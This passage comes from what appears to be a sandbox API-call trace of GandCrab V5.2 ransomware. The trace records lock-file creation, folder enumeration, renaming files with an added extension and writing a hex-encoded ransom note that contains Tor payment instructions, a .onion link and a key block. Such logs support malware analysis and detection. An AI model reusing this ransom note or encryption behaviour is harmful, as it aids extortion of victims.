49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.269] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0069.270] CloseHandle (hObject=0x2bc) returned 1 [0069.270] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.270] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.271] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x24a)) [0069.271] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.271] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.271] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.271] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a09d2ca4deb61a.lock") returned 76 [0069.271] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0069.271] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.272] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.272] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 52 [0069.272] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0069.272] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5036f8 [0069.272] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.272] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.272] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.272] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.272] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.272] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.272] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.272] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a09d2ca4deb61a.lock" [0069.272] lstrlenW (lpString=".titwmvjl") returned 9 [0069.272] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a09d2ca4deb61a.lock") returned 76 [0069.273] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.273] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 85 [0069.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a09d2ca4deb61a.lock") returned 76 [0069.273] lstrlenW (lpString=".lock") returned 5 [0069.273] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.273] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.273] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.273] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.273] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.273] lstrcmpW (lpString1="DC", lpString2=".") returned 1 [0069.273] lstrcmpW (lpString1="DC", lpString2="..") returned 1 [0069.273] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="DC" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC" [0069.273] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\" [0069.273] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.274] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.274] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.274] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.274] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.274] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.275] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.275] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\\\TITWMVJL-DECRYPT.txt") returned 76 [0069.275] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0069.276] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\